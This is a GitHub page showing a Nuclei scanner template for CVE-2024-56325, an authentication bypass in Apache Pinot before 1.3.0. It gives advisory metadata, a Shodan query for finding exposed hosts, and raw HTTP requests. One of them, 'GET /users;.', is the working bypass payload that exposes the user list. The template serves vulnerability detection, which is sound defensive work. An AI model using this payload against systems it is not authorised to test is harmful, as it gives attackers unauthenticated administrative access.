forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-56325.yaml
More file actions
65 lines (58 loc) · 2.03 KB
/
CVE-2024-56325.yaml
File metadata and controls
65 lines (58 loc) · 2.03 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
id: CVE-2024-56325
info:
name: Apache Pinot < 1.3.0 - Authentication Bypass
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
This vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.The specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.
impact: |
Unauthenticated attackers can bypass authentication by injecting special characters in URIs, gaining unauthorized access to Apache Pinot administrative functions.
remediation: |
Update Apache Pinot to version 1.3.0 or later to address the authentication bypass vulnerability.
reference:
- https://www.zerodayinitiative.com/advisories/ZDI-25-109/
- https://github.com/advisories/GHSA-6jwp-4wvj-6597
- https://lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v
- http://www.openwall.com/lists/oss-security/2025/03/27/8
classification:
cve-id: CVE-2024-56325
cwe-id: CWE-288
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
epss-score: 0.30273
epss-percentile: 0.96597
cpe: cpe:2.3:a:apache:pinot:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:1696974531
tags: cve,cve2024,apache,pinot,auth-bypass,vuln
http:
- raw:
- |
GET /users HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 403
- 401
internal: true
- raw:
- |
GET /users;. HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"users"'
- type: status
status:
- 200
- type: word
part: header
words:
- 'Pinot-Controller-'